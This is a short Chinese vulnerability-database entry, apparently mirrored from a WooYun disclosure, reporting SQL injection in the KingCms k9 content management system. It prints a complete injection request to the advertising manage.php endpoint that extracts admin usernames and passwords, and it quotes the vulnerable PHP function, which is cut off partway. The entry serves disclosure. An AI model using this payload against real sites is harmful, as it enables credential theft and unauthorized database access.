KingCms最新版(k9)注入一枚#7

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: KingCms最新版(k9)注入一枚 ### 详细说明: 朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。 在wooyun上看到了几个漏洞,如: [WooYun: kingcms最新版sql注入漏洞](http://www.wooyun.org/bugs/wooyun-2013-043520) 注入点:GET /apps/advertising/manage.php?jsoncallback=1&_=1&CMD=edt&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&type=1'/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(username,0x23,userpass)FROM/**/king_user/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a%23 HTTP/1.1 注入参数:type 问题文件在/apps/advertising/manage.php ``` function _edt(){ $u=new user; if (!$u->auth_role('advertising_edit',true)) kc_tip('您无权编辑广告'); $db=new db; $str=new str; $id=kc_post('id',2); $data=array(); $time=time(); $type=kc_post('type'); $today=$str->formatDate($time,'Ymd'); //$config=require ROOT.'apps/advertising/include/config.php'; //$config=require ROOT.T.'advertising/include/config.php'; if...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息